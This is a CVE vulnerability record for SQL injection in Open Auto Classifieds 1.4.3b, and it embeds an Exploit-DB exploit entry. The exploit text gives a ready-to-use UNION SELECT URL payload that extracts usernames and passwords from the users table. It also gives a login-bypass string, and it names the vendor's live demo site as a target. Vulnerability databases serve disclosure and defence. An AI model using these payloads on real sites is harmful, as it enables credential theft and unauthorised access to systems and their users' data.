ID: CVE-2008-6656
Type: cve
Reporter: cve@mitre.org
Modified: 2017-09-29T01:33:00
Description
Multiple SQL injection vulnerabilities in Open Auto Classifieds 1.4.3b allow remote attackers to execute arbitrary SQL commands via (1) the id parameter to listings.php and (2) the username field to login.php.
{"exploitdb": [{"lastseen": "2016-01-31T23:14:58", "description": "Open Auto Classifieds 1.4.3b Remote SQL Injection Vulnerabilities. CVE-2008-6656. Webapps exploit for php platform", "published": "2008-05-02T00:00:00", "type": "exploitdb", "title": "Open Auto Classifieds 1.4.3b Remote SQL Injection Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6656"], "modified": "2008-05-02T00:00:00", "id": "EDB-ID:5531", "href": "https://www.exploit-db.com/exploits/5531/", "sourceData": "|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\n| _ __ __ __ ______ |\n| /' \\ __ /'__`\\ /\\ \\__ /'__`\\ /\\ ___\\ |\n| /\\_, \\ ___ /\\_\\/\\_\\L\\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ __\\ \\ \\__/ |\n| \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ \\___``\\ |\n| \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\L\\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ \\/\\ \\L\\ \\ |\n| \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ \\ \\____/ |\n| \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ \\/___/ |\n| \\ \\____/ >> Kings of injection |\n| \\/___/ |\n| |\n|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\n\nTitle :: Remote SQL Injection\n\n\nAuthor :: InjEctOr [s0f (at) w.cn]\n\n&& Fisher762 [SQ7 (at) w.cn]\n\n\n\nApplication :: Open Auto Classifieds vehicle listings manager v1.4.3b\n\nDownload :: http://mesh.dl.sourceforge.net/sourceforge/openauto/openauto_v1.4.3b.zip\n\n\nDork 1 :: use your mind\n\n\nGreets :: Allah , Muslims Hackers\n\nTerms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.\n\n\n\n--------------------------------------------[C o n t e x t]-----------------------------------------\n\n\nExpl0!t::\n\nurl :\n\nhttp://127.0.0.1/listings.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users\n\n\nand bypass login:\n\nhttp://openautoclassifieds.com/login.php << from demo site :)\n\nin Username field just type ' or 1=1 /*\n\n\nnote:\n\nthere is a lot of versions in this script and every one using Different number of columns but the name of tbl and col is same\n\n# milw0rm.com [2008-05-02]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/5531/"}]}